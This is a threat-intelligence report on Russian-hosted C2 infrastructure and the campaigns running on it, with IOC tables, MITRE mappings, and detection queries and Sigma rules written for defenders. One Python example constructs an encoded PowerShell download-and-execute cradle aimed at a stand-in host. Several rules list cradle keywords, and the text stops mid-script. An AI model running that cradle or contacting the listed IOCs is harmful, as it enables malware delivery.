1,250 Russian C2 Servers Mapped: How Five Providers Enable Malware Operations
Between January 1 and April 1, 2026, researchers at Hunt.io identified 1,252 active command and control (C2) servers spread across 165 Russian ISPs and hosting providers, alongside 69 phishing sites and 75 malicious open directories [1]. C2 servers made up the vast majority of the detected malicious infrastructure. The concentration is severe: the top five providers host 755 of the 1,252 detected C2 servers (about 60%), and the campaigns running on this infrastructure span everything from IoT botnets to state-aligned espionage tooling.
This is not a story about a few rogue VPS accounts slipping through moderation queues. The sheer volume and persistence of malicious hosting across a small cluster of providers points to something structural.
The Big Five: Provider Breakdown
Hunt.io's telemetry puts the top five providers at [1]:
| Provider | C2 Detections |
|---|---|
| TimeWeb (JSC TIMEWEB) | 311 |
| WebHost1 | 140 |
| REG.RU | 138 |
| VDSina | 86 |
| PROSPERO OOO | 80 |
TimeWeb dominates the list. One documented campaign on TimeWeb infrastructure used the ClickFix fake CAPTCHA technique to trick users into executing a PowerShell command, which then downloaded Latrodectus v2.3 malware [2]. REG.RU, one of Russia's largest domain registrars and hosting companies, was directly linked to a Lumma Stealer operation that abused Google Groups as redirectors [2]. PROSPERO OOO has previously appeared in abuse reports, and its continued presence at scale suggests no meaningful remediation has occurred.
The remaining 160 providers contributed the other 40% of detections, but the concentration at the top five is the critical finding. A disproportionate share of malicious infrastructure sits within a small number of networks [1].
Keitaro: The Gray-Market Engine Behind Half the C2 Fleet
Keitaro, a traffic distribution system (TDS) marketed to affiliate marketers, led every malware family and tool in the dataset with 587 unique C2 IP addresses [1], nearly half of the entire set.
Keitaro itself is not malware. It is a legitimate traffic redirection platform. But its adoption by cybercriminals for cloaking, filtering, and routing victims to exploit kits and malware payloads has made it the single largest category of C2 infrastructure in this dataset. The scale of abuse shows how a commercial tool becomes foundational to criminal operations when there is no enforcement pressure on the hosting side.
IoT Botnets: Hajime, Mozi, and Mirai Still Thriving
The Hajime IoT botnet maintained 191 C2 endpoints across Russian infrastructure [1]. Mozi and Mirai variants were also present [1]. Kaspersky researchers separately documented the Stan Ghouls group hosting Mirai files on infrastructure linked to prior campaigns [14].
These botnets have been tracked for years. Their persistence on Russian hosting suggests a sustainable model: providers either do not act on abuse reports or do not receive them.
Offensive Security Tooling Hosted in the Open
The dataset included several commercial and open-source offensive frameworks hosted on Russian infrastructure [1]:
| Tool | Endpoints Detected | Type |
|---|---|---|
| Tactical RMM | 87 | Legitimate RMM, abused by ransomware groups |
| Cobalt Strike | 55 (verified + unverified) | Commercial red team framework |
| Sliver | 24 | Open-source C2 framework (Golang) |
| Ligolo-ng | 10 | Open-source tunneling/pivoting tool |
| Acunetix | Detected | Web vulnerability scanner |
| Interactsh | Detected | Out-of-band interaction tool |
| Gophish | Detected | Open-source phishing framework |
Sliver, an open-source red team C2 framework written in Go, includes a package manager called "armory" for staging additional tools [13]. In one incident response case, a Sliver C2 server at 193.29.13.179 was observed communicating over port 8888 using mTLS [12]. Cobalt Strike remains widely used by both red teams and intrusion operators, and its open presence on these networks indicates that providers are not screening for well-known C2 server fingerprints. One caveat: team servers and Sliver listeners are identified from the outside by fingerprinting (default TLS certificates, HTTP response quirks, exposed ports), so the "verified + unverified" counts are detections, not proof that every endpoint is operated by a criminal rather than a red team.
Active Campaigns: ClickFix, Google Groups Abuse, and Ukrainian Targeting
The observation window captured several distinct campaigns running on this infrastructure.
Latrodectus v2.3 via ClickFix on TimeWeb
A campaign hosted on JSC TIMEWEB used fake CAPTCHA pages (the ClickFix technique) to trick victims into executing PowerShell commands that downloaded Latrodectus v2.3 [2]. Palo Alto's Unit 42 tracked increasing traffic to Latrodectus-controlled domains using ClickFix during March-April 2025, and the technique has continued into 2026 [3]. Latrodectus variants observed in 2025 used JavaScript downloaders to retrieve MSI files and employed large junk JSON variables with names like var_Apple_Palantir38 to evade static analysis [3]. Unit 42 responded to a dozen incidents in 2025 alone where ClickFix was the initial access vector [10].
Lumma Stealer via Google Groups on REG.RU
REG.RU infrastructure supported a Lumma Stealer campaign that used Google Groups as redirectors [2]. CTM360's February 2026 threat intelligence report documented more than 4,000 malicious Google Groups and 3,500 Google-hosted URLs being used in an active campaign [4]. Windows users received Lumma Stealer, while Linux users were served a trojanized Ninja Browser [4]. Attackers infiltrated Google Groups with seemingly legitimate technical discussions containing malicious links [4]. CISA confirmed LummaC2 runs in memory, gathers system information, and exfiltrates it to C2 servers [7].
SmartApeSG Multi-Stage Campaign
The SmartApeSG campaign, observed on March 24, 2026, delivered four malware families in a staged sequence on Hosting Technology LTD infrastructure [6]. The kill chain was precise [6]:
- 17:11 UTC: ClickFix script executed
- 17:12 UTC: Remcos RAT deployed
- 17:16 UTC: NetSupport RAT deployed
- 18:18 UTC: StealC deployed
- 19:36 UTC: Sectop RAT (ArechClient2) deployed
Remcos RAT, StealC, and Sectop RAT packages all used DLL side-loading via legitimate executables [6]. The file jp2launcher.exe, a legitimate Java Runtime Environment component, was used to sideload a malicious msvcp140.dll [10]. msvcp140.dll is the Visual C++ runtime library that jp2launcher.exe legitimately imports; placing a malicious copy beside the executable wins the DLL search order, so the tell is the load path, not the file name. NetSupport RAT is a legitimate remote administration tool reconfigured for attacker-controlled servers [6].
UAC-0252: SHADOWSNIFF and SALATSTEALER Targeting Ukraine
Beget LLC infrastructure hosted a UAC-0252 campaign using SHADOWSNIFF and SALATSTEALER infostealers [2][5]. CERT-UA has tracked UAC-0252 intrusions since January 2026, with campaigns using phishing lures impersonating Ukrainian government institutions [5]. The campaign exploits WinRAR vulnerability CVE-2025-8088 [5]. SALATSTEALER is a Go-based infostealer operating as MaaS [5].
This is the campaign most directly tied to state-aligned objectives. GRU Unit 29155 has conducted over 14,000 instances of domain scanning across at least 26 NATO members and deployed WhisperGate destructive malware against Ukraine since January 2022, using VPNs, VPS providers, and public tools like Raspberry Robin and SaintBot [8].
IOC Table
The following indicators appeared verbatim in source material:
IP Addresses
| IP Address | Context | Source |
|---|---|---|
| 193.29.13.179 | Sliver C2 server, communicating over port 8888 via mTLS | [12] |
Domains
| Domain | Context | Source |
|---|---|---|
| healgeni.live | Lumma Stealer C2 infrastructure | [4] |
| docusign.sa.com | Fake domain distributing NetSupport RAT | [10] |
| oktacheck.it.com | Fake domain distributing NetSupport RAT | [10] |
| hgame33.com | Hosting Mirai malware files, linked to Stan Ghouls campaign | [14] |
| docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz.com | FancyBear phishing domain | [9] |
Filenames
| Filename | Context | Source |
|---|---|---|
| jp2launcher.exe | Legitimate JRE component used for DLL sideloading | [10] |
| msvcp140.dll | Malicious DLL sideloaded by jp2launcher.exe | [10] |
| client32.exe | NetSupport RAT executable | [10] |
Malware Families Observed on Russian Infrastructure
| Malware | C2 Endpoints / Notes | Source |
|---|---|---|
| Keitaro TDS | 587 unique C2 IPs | [1] |
| Hajime | 191 C2 servers | [1] |
| Tactical RMM | 87 endpoints | [1] |
| Cobalt Strike | 55 endpoints (verified + unverified) | [1] |
| Sliver | 24 endpoints | [1] |
| Ligolo-ng | 10 endpoints | [1] |
| Latrodectus v2.3 | Delivered via ClickFix on TimeWeb | [2] |
| Lumma Stealer / LummaC2 | Distributed via Google Groups on REG.RU | [2][7] |
| Remcos RAT | SmartApeSG campaign, DLL sideloading | [2][6] |
| SHADOWSNIFF | UAC-0252 infostealer on Beget LLC | [2][5] |
| SALATSTEALER | Go-based infostealer, MaaS model | [2][5] |
| NetSupport RAT | SmartApeSG campaign | [6] |
| StealC | SmartApeSG campaign, DLL sideloading | [6] |
| Sectop RAT (ArechClient2) | SmartApeSG campaign | [6] |
| Mirai | IoT botnet on Russian infrastructure | [1][14] |
| Mozi | IoT botnet on Russian infrastructure | [1] |
MITRE ATT&CK Mapping
| Technique ID | Name | Context |
|---|---|---|
| T1574.002 | Hijack Execution Flow: DLL Side-Loading | SmartApeSG: Remcos, StealC, Sectop RAT via jp2launcher.exe [6][10] |
| T1566.001 | Phishing: Spearphishing Attachment | UAC-0252 phishing lures with WinRAR exploit [5] |
| T1566.002 | Phishing: Spearphishing Link | Lumma Stealer via Google Groups links [4] |
| T1059.001 | Command and Scripting Interpreter: PowerShell | ClickFix technique executing PowerShell commands [2][3] |
| T1071.001 | Application Layer Protocol: Web Protocols | C2 communications over HTTP/HTTPS [1] |
| T1082 | System Information Discovery | LummaC2 gathering system information before exfiltration [7] |
| T1055 | Process Injection | LummaC2 operating in memory [7] |
| T1203 | Exploitation for Client Execution | CVE-2025-8088 WinRAR exploitation via phishing attachment [5] (WinRAR is a client application, so T1190 does not apply) |
| T1140 | Deobfuscate/Decode Files or Information | Latrodectus junk JSON obfuscation variables [3] |
| T1485 | Data Destruction | WhisperGate destructive malware deployed by Unit 29155 [8] |
| T1588.001 | Obtain Capabilities: Malware | Unit 29155 acquiring SaintBot from dark web [8] |
Detection and Hunting
Network-Level Indicators:
- Monitor for outbound connections to `193.29.13.179:8888` (mTLS) [12].
- Flag DNS queries resolving `healgeni.live`, `docusign.sa.com`, `oktacheck.it.com`, and `hgame33.com` [4][10][14].
- Detect mTLS connections on non-standard ports (Sliver's observed behavior on port 8888) [12].
- Geo-flag outbound C2 traffic to Russian ASNs associated with TimeWeb, WebHost1, REG.RU, VDSina, and PROSPERO OOO. While legitimate traffic exists to these providers, C2 beaconing patterns (regular intervals, small payloads, encoded data) should trigger investigation.
Endpoint-Level Indicators:
- Hunt for `jp2launcher.exe` loading `msvcp140.dll` from non-standard paths. The legitimate executable lives in the Java Runtime directory and the legitimate DLL in the Java directory or `System32`/`SysWOW64`; a copy in temp or download folders is suspicious [10].
- Alert on `client32.exe` (NetSupport RAT) execution, particularly when launched by a browser or script interpreter [10].
- Look for PowerShell execution chains triggered by `mshta.exe`, by `explorer.exe` (the Win+R Run dialog, the usual ClickFix paste target), or by browser processes [3][10].
- Detect MSI file downloads initiated by JavaScript in browser contexts (Latrodectus delivery chain) [3].
SIEM/Log Queries:
- Search proxy logs for traffic to Google Groups containing redirect chains to non-Google domains, a hallmark of the Lumma Stealer campaign [4].
- Query for WinRAR.exe writing files into a user's Startup folder, relevant to CVE-2025-8088 exploitation by UAC-0252 [5]: the bug is a path traversal during extraction, so the dropped payload runs at next logon rather than as a WinRAR child process. WinRAR spawning unexpected child processes is a weaker, secondary check.
- Monitor for rapid sequential installation of multiple RATs on a single endpoint (the SmartApeSG pattern deployed four families within 2.5 hours) [6].
Analysis
The Hunt.io dataset confirms what many defenders have suspected: a small number of Russian hosting providers serve as the backbone for a vast, diverse C2 ecosystem. C2 servers represented the vast majority of detected malicious infrastructure [1].
The Keitaro TDS numbers deserve particular attention. At 587 C2 IPs, Keitaro accounts for more C2 infrastructure than the next several malware families combined [1]. This tool sits in a gray zone: commercially sold, technically legitimate, but massively abused. Its dominance suggests that a significant portion of Russian-hosted C2 infrastructure supports pay-per-install and traffic distribution schemes rather than targeted espionage.
The UAC-0252 campaign stands apart from the profit-motivated operations. CERT-UA's tracking of SHADOWSNIFF and SALATSTEALER since January 2026 suggests a dual-use operation: intelligence collection paired with potential destructive capability [5]. This mirrors GRU Unit 29155's documented pattern of combining espionage tools with destructive malware like WhisperGate [8].
The SmartApeSG kill chain, deploying four separate malware families within a 2.5-hour window, shows operational maturity [6]. This is not spray-and-pray. It is a structured, sequential deployment designed to maintain persistence even if defenders catch one component.
Red Sheep Assessment
Confidence: Moderate
The concentration of C2 infrastructure across five providers is not accidental, and it almost certainly is not the result of providers simply being overwhelmed by abuse. Three factors point to something more deliberate.
First, the persistence. These providers have appeared in abuse reports and threat intelligence for years. TimeWeb and PROSPERO OOO are not new to these lists. The fact that 311 active C2 nodes sit on TimeWeb infrastructure [1] after years of public reporting indicates that abuse complaints, at minimum, are not resulting in takedowns.
Second, the diversity. These providers host everything from commodity IoT botnets (Hajime, Mirai) to state-associated offensive tooling (Cobalt Strike, Sliver) to active espionage campaigns (UAC-0252). A provider that inadvertently hosts one category of abuse would likely act when confronted with evidence. Hosting the full spectrum suggests tolerance across the board.
Third, the economic model. Russian bulletproof hosting operates on a known commercial basis. The question is where these five providers fall on the spectrum between "negligent" and "complicit." The data suggests they occupy different positions: PROSPERO OOO has long been associated with bulletproof hosting. TimeWeb and REG.RU are larger, more mainstream providers where the volume of abuse may reflect institutional unwillingness to invest in trust and safety rather than active complicity.
The contrarian view: Russia's legal framework makes it genuinely difficult for providers to act on abuse reports from Western entities, and some of this infrastructure may persist due to jurisdictional barriers rather than intent. This is plausible for some of the 160 smaller providers, but harder to sustain as an explanation for providers hosting hundreds of active C2 nodes.
The Keitaro TDS dominance may be the most telling signal. Nearly half the C2 infrastructure supports a traffic distribution system primarily used in pay-per-install schemes [1]. This is the commercial engine of Russian cybercrime, and its scale on these providers suggests the hosting relationship is financially beneficial to both parties.
Defender's Checklist
- [ ] Block or monitor Russian hosting ASNs: Create network-level alerts for outbound connections to the ASNs of TimeWeb, WebHost1, REG.RU, VDSina, and PROSPERO OOO. Organizations without Russian business relationships usually have little legitimate traffic to these providers; resolve the current ASNs from RIR or WHOIS data before deploying, since providers operate several ASNs and renumber. Query (ASN values are placeholders):
  `dst_asn IN (TimeWeb_ASN, WebHost1_ASN, REGRU_ASN, VDSina_ASN, PROSPERO_ASN) | stats count by src_ip, dst_ip`
- [ ] Hunt for ClickFix indicators: Search endpoint telemetry for PowerShell or mshta execution spawned by `explorer.exe` (the Run dialog) or a browser process (`chrome.exe -> powershell.exe` or `msedge.exe -> mshta.exe -> powershell.exe`) with a hidden-window flag, an encoded command, or a download cradle on the command line. This is the primary initial access vector for the Latrodectus and Lumma Stealer campaigns [3][10].
- [ ] Detect DLL sideloading via `jp2launcher.exe`: Query EDR for `jp2launcher.exe` loading `msvcp140.dll` from any path outside the Java installation directory and `%SystemRoot%\System32` / `SysWOW64` (the DLL is the Visual C++ runtime, so a System32 load is normal). Sysmon Event ID 7 (Image Loaded) is ideal for this: `ImageLoaded="*\msvcp140.dll" AND Image="*\jp2launcher.exe" AND NOT ImageLoaded IN ("*\Java\*", "*\System32\*", "*\SysWOW64\*")` [10].
- [ ] Audit Google Groups usage: Review proxy and CASB logs for requests whose referer is Google Groups and whose destination is a non-Google domain, particularly `healgeni.live`. Block the domain at the DNS layer [4].
- [ ] Patch WinRAR for CVE-2025-8088: The UAC-0252 campaign actively exploits this vulnerability. Verify all endpoints run patched versions (WinRAR 7.13 or later). Query software inventory for WinRAR installations below the patched version [5].
References
- Hunt.io, "Exposing Russian Malicious Infrastructure: 1,250+ C2 Servers Mapped Across 165 Providers" - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
- Cybersecurity News, "1,250+ C2 Servers Mapped Across Russian Hosting Across 165 Providers" - https://cybersecuritynews.com/1250-c2-servers-mapped-across-russian-hosting/
- Palo Alto Unit 42, "Fix the Click: Preventing the ClickFix Attack Vector" - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
- BleepingComputer, "CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups" - https://www.bleepingcomputer.com/news/security/ctm360-lumma-stealer-and-ninja-browser-malware-campaign-abusing-google-groups/
- SOC Prime, "UAC-0252 Attack Detection: SHADOWSNIFF and SALATSTEALER Fuel Phishing Campaigns in Ukraine" - https://socprime.com/blog/uac-0252-attacks-using-shadowsniff-salatstealer/
- SANS ISC, "SmartApeSG campaign pushes Remcos RAT, NetSupport RAT, StealC, and Sectop RAT" - https://isc.sans.edu/diary/SmartApeSG+campaign+pushes+Remcos+RAT+NetSupport+RAT+StealC+and+Sectop+RAT+ArechClient2/32826
- CISA, "Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations" - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141b
- CISA, "Russian Military Cyber Actors Target US and Global Critical Infrastructure" - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a
- CtrlAltIntel, "FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops" - https://ctrlaltintel.com/threat%20research/FancyBear/
- GBHackers, "Hackers Exploit ClickFix Tactics to Spread NetSupport RAT, Latrodectus, and Lumma Stealer" - https://gbhackers.com/hackers-exploit-clickfix-tactics/
- MITRE ATT&CK, "Lumma Stealer, Software S1213" - https://attack.mitre.org/software/S1213/
- Rapid7, "RCE to Sliver: IR Tales from the Field" - https://rapid7.com/blog/post/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
- MITRE ATT&CK, "Sliver, Software S0633" - https://attack.mitre.org/software/S0633/
- Kaspersky Securelist, "Stan Ghouls attacks in Russia and Uzbekistan" - https://securelist.com/stan-ghouls-in-uzbekistan/118738/
---
Hunt Guide: Hunt Report: Russian Hosting Infrastructure Enabling Diverse C2 Operations
Hypothesis: If threat actors are leveraging Russian hosting providers (TimeWeb, REG.RU, WebHost1, VDSina, PROSPERO) for C2 infrastructure, we expect to observe outbound connections to these ASNs with beaconing patterns, DLL sideloading via jp2launcher.exe, ClickFix-initiated PowerShell execution, and traffic to documented IOCs in our proxy, DNS, and endpoint telemetry.
Intelligence Summary: Hunt.io identified 1,250+ active C2 servers concentrated across five Russian hosting providers between January-April 2026, with 587 Keitaro TDS instances representing nearly half of all infrastructure. Active campaigns include Latrodectus via ClickFix, Lumma Stealer abusing Google Groups, and UAC-0252 targeting Ukraine with SHADOWSNIFF/SALATSTEALER infostealers.
Confidence: High | Priority: Critical
Scope
- Networks: All enterprise networks with external internet connectivity, prioritize DMZ and user workstation VLANs
- Timeframe: Initial sweep: 90 days historical; Continuous hunting: Real-time + 30-day rolling window
- Priority Systems: External-facing web servers, VPN endpoints, email gateways, user workstations with internet access, systems with WinRAR installed
MITRE ATT&CK Techniques
T1574.002 — DLL Side-Loading (Persistence, Privilege Escalation, Defense Evasion) [P1]
The SmartApeSG campaign deployed Remcos RAT, StealC, and Sectop RAT via DLL side-loading through legitimate executables [6]; the documented pair is jp2launcher.exe (a legitimate Java Runtime component) loading a malicious msvcp140.dll [10]. msvcp140.dll is the Visual C++ runtime, so loads from the Java directory or System32/SysWOW64 are normal and the query must key on the load path.
Splunk SPL:
index=* sourcetype=sysmon EventCode=7 ImageLoaded="*\\msvcp140.dll" Image="*\\jp2launcher.exe" | where NOT match(ImageLoaded, "(?i)(program files.*\\\\java\\\\|\\\\system32\\\\|\\\\syswow64\\\\)") | stats count by ComputerName, Image, ImageLoaded, ProcessId | sort -count
Elastic KQL:
event.code:7 AND file.name:"msvcp140.dll" AND process.executable:*jp2launcher.exe AND NOT file.path:(*\\Java\\* OR *\\System32\\* OR *\\SysWOW64\\*)
Sigma Rule:
  title: Suspicious DLL Side-Loading via jp2launcher.exe
  id: 8c5e6b4a-2f3d-4e1a-9b7c-1a2b3c4d5e6f
  status: experimental
  description: Detects jp2launcher.exe loading msvcp140.dll from outside the Java installation and the system runtime directories
  author: RedSheep Security/Stone
  references:
    - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
  logsource:
    product: windows
    category: image_load
  detection:
    selection:
      Image|endswith: '\jp2launcher.exe'
      ImageLoaded|endswith: '\msvcp140.dll'
    filter:
      ImageLoaded|contains:
        - '\Program Files\Java\'
        - '\Program Files (x86)\Java\'
        - '\Windows\System32\'
        - '\Windows\SysWOW64\'
    condition: selection and not filter
  falsepositives:
    - Java runtimes installed outside \Program Files\Java\ (vendor JDKs bundled with applications)
  level: high
  tags:
    - attack.defense_evasion
    - attack.persistence
    - attack.t1574.002
Focus on jp2launcher.exe processes spawned from temp directories or user download folders. Legitimate Java processes typically load DLLs from standard Java installation paths.
T1059.001 — PowerShell (Execution) [P1]
ClickFix campaigns trick users into executing PowerShell commands via fake CAPTCHA pages to download Latrodectus v2.3 and other malware
Splunk SPL:
index=* sourcetype=sysmon EventCode=1 (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\mshta.exe") (ParentImage="*\\explorer.exe" OR ParentImage="*\\chrome.exe" OR ParentImage="*\\msedge.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\mshta.exe") | where match(CommandLine, "(?i)(-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s|\biwr\b|\biex\b|\birm\b|invoke-webrequest|invoke-expression|downloadstring|https?://)") | stats count by ComputerName, User, ParentImage, Image, CommandLine | sort -count
Elastic KQL:
event.code:1 AND process.name:(powershell.exe OR pwsh.exe OR mshta.exe) AND process.parent.name:(explorer.exe OR chrome.exe OR msedge.exe OR firefox.exe OR mshta.exe) AND process.command_line:(*hidden* OR *-enc* OR *iwr* OR *iex* OR *Invoke-WebRequest* OR *Invoke-Expression* OR *DownloadString* OR *http*)
Sigma Rule:
  title: ClickFix PowerShell Execution Pattern
  id: a7c9d4b2-8f1e-4c3a-9d5b-2e7f8a9c1b4d
  status: experimental
  description: Detects PowerShell or mshta launched from the Run dialog (explorer.exe) or a browser with a hidden-window flag, an encoded command, or a download cradle on the command line, the ClickFix social engineering pattern
  author: Unit42 (adapted by RedSheep Security/Stone)
  references:
    - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
  logsource:
    category: process_creation
    product: windows
  detection:
    selection_child:
      Image|endswith:
        - '\powershell.exe'
        - '\pwsh.exe'
        - '\mshta.exe'
    selection_parent:
      ParentImage|endswith:
        - '\explorer.exe'
        - '\chrome.exe'
        - '\msedge.exe'
        - '\firefox.exe'
        - '\mshta.exe'
    selection_cmdline:
      CommandLine|contains:
        - ' hidden'
        - '-enc'
        - '-ec '
        - 'iwr '
        - 'iex '
        - 'irm '
        - 'Invoke-WebRequest'
        - 'Invoke-Expression'
        - 'DownloadString'
        - 'http'
    condition: all of selection_*
  falsepositives:
    - Administrators pasting download one-liners into the Run dialog
  level: high
  tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1204.002
The parent matters: when a victim pastes the ClickFix command into Win+R, Sysmon records explorer.exe as the parent of powershell.exe, not the browser, so a browser-parent-only rule misses the common case. PowerShell script block logging (Event ID 4104) carries no parent process field; use it as a second query on the same hosts to recover the decoded script content.
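The scoring logic described above, as an added example that is not part of the hunt guide or of Unit 42's material: it scores Sysmon process-creation events for the ClickFix pattern and decodes a `-EncodedCommand` payload so the hidden download cradle can be read. The events, the TEST-NET address in the payload, and the score threshold are constructed assumptions.

```python
"""
Added example, not from Unit 42 or this hunt guide: scores process-creation
events for the ClickFix pattern and decodes -EncodedCommand payloads so the
hidden download cradle is visible. Field names follow Sysmon Event ID 1; the
events, the TEST-NET address and the thresholds are constructed assumptions.
"""
from __future__ import annotations
import base64
import re

# Parents that should rarely launch a script interpreter on a workstation.
# explorer.exe is included because pasting into the Win+R Run dialog is the usual ClickFix path.
SUSPICIOUS_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "mshta.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(
    r"\b(invoke-webrequest|invoke-restmethod|invoke-expression|iwr|irm|iex|"
    r"downloadstring|downloadfile|start-bitstransfer)\b|https?://", re.I)
HIDDEN_RE = re.compile(
    r"-(w|window|windowstyle)\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I)
ENC_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed sample payload (TEST-NET-3 address), encoded the way PowerShell expects: UTF-16LE then base64.
FAKE_PAYLOAD = "iex (iwr 'http://203.0.113.10/x.ps1')"
ENCODED = base64.b64encode(FAKE_PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # Constructed: victim pasted the ClickFix one-liner into Win+R, so explorer.exe is the parent.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell -w hidden -enc {ENCODED}"},
    # Constructed: scheduled inventory script; a bypass flag on its own is not enough to alert.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    # Constructed: user opened PowerShell from the Start menu.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text, or '' if there is none or it does not decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> tuple[int, list[str]]:
    """One point per independent ClickFix signal; the decoded payload is inspected too."""
    reasons: list[str] = []
    image, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
    if image not in INTERPRETERS:
        return 0, reasons
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"parent={parent}")
    if decoded:
        reasons.append("encoded-command")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden-or-bypass-flags")
    if DOWNLOAD_RE.search(cmd + " " + decoded):
        reasons.append("download-or-exec-cradle")
    return len(reasons), reasons


def hunt(events: list[dict], threshold: int = 2) -> list[dict]:
    """Events scoring at or above the threshold, annotated with the reasons and decoded payload."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": score, "reasons": reasons,
                         "decoded": decode_encoded_command(ev.get("CommandLine", ""))})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["decoded"])
```

Only the first constructed event crosses the threshold (parent, encoding, hidden window and a cradle in the decoded text); the two benign events score one point each, which is why a single signal such as `explorer.exe -> powershell.exe` should not alert on its own.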
T1071.001 — Application Layer Protocol: Web Protocols (Command and Control) [P2]
C2 communications to Russian hosting infrastructure over HTTP/HTTPS, including Sliver C2 on port 8888 with mTLS [12]. The AS_* values in the queries below are placeholders: resolve each provider's current ASNs from RIR or WHOIS data before deploying, because providers operate several ASNs and renumber.
Splunk SPL:
index=* (sourcetype=proxy OR sourcetype=firewall) (dest_ip="193.29.13.179" OR dest_port=8888 OR dest_asn IN ("AS_TIMEWEB","AS_WEBHOST1","AS_REGRU","AS_VDSINA","AS_PROSPERO")) | eval russian_asn=case(dest_asn="AS_TIMEWEB","TimeWeb", dest_asn="AS_WEBHOST1","WebHost1", dest_asn="AS_REGRU","REG.RU", dest_asn="AS_VDSINA","VDSina", dest_asn="AS_PROSPERO","PROSPERO", 1=1,"Other") | bucket _time span=1h | stats count, dc(src_ip) as unique_sources, values(dest_port) as ports, sum(bytes_out) as total_bytes by _time, dest_ip, russian_asn | where count > 10 OR dest_ip="193.29.13.179"
Elastic KQL:
destination.ip:193.29.13.179 OR destination.port:8888 OR destination.as.number:(AS_TIMEWEB OR AS_WEBHOST1 OR AS_REGRU OR AS_VDSINA OR AS_PROSPERO)
Sigma Rule:
  title: Suspicious Outbound Connection to Russian C2 Infrastructure
  id: c5e8f9a1-7d3b-4a2c-8e6f-9b1c2d4a7e5f
  status: experimental
  description: Detects outbound connections to the documented Sliver endpoint or to ASNs of Russian hosting providers associated with C2 infrastructure (AS_* values are placeholders to be resolved from RIR data at deployment)
  author: RedSheep Security/Stone
  references:
    - https://hunt.io/blog/russian-malicious-infrastructure-c2-servers-mapped
  logsource:
    category: firewall
  detection:
    selection_ip:
      dst_ip: '193.29.13.179'
    selection_port:
      dst_port: 8888
    selection_asn:
      dst_asn:
        - 'AS_TIMEWEB'   # placeholder: JSC TIMEWEB
        - 'AS_WEBHOST1'  # placeholder: WebHost1
        - 'AS_REGRU'     # placeholder: REG.RU
        - 'AS_VDSINA'    # placeholder: VDSina
        - 'AS_PROSPERO'  # placeholder: PROSPERO OOO
    condition: 1 of selection_*
  falsepositives:
    - Legitimate business connections to Russian hosting providers
    - Non-C2 services on port 8888, a common alternate HTTP port
  level: medium
  tags:
    - attack.command_and_control
    - attack.t1071.001
Focus on connections with beaconing patterns (regular intervals, small payloads) and on port 8888; the port selection alone is noisy, since 8888 is widely used for legitimate HTTP services. Validate against business justification for Russian hosting connections.
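The beaconing test the note above asks for, as an added example that is not part of the hunt guide: it groups constructed proxy log lines by source and destination, measures how regular the inter-connection gaps are (coefficient of variation of the gaps) and how small the uploads are, and calls a flow a beacon when both are low. The log layout (`timestamp src dst:port bytes_out`), hosts, and thresholds are assumptions for the example.

```python
"""
Added example, not part of the Hunt.io report or this hunt guide: a beaconing
detector run over constructed proxy log lines. The field layout
("ts src dst:port bytes_out"), the hosts and the thresholds are assumptions.
"""
from __future__ import annotations
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, median, pstdev


def _mk(base: datetime, offset_s: int, src: str, dst: str, nbytes: int) -> str:
    return f"{(base + timedelta(seconds=offset_s)).isoformat()} {src} {dst} {nbytes}"


_BASE = datetime(2026, 3, 24, 17, 11, 0)
# Constructed: a 60-second beacon with a few seconds of jitter and small uploads
# (an mTLS listener on 8888, mirroring the Sliver case in [12]).
_JITTER = [0, 3, -2, 5, -4, 1, 2, -3, 4, -1]
BEACON_LINES = [_mk(_BASE, 60 * i + j, "10.0.0.5", "203.0.113.10:8888", 512)
                for i, j in enumerate(_JITTER)]
# Constructed: a user browsing a site, with irregular gaps and mixed transfer sizes.
_BROWSE = [(0, 1500), (2, 40000), (9, 3000), (10, 250000), (40, 800),
           (41, 1200), (42, 90000), (120, 2000), (300, 5000), (305, 60000)]
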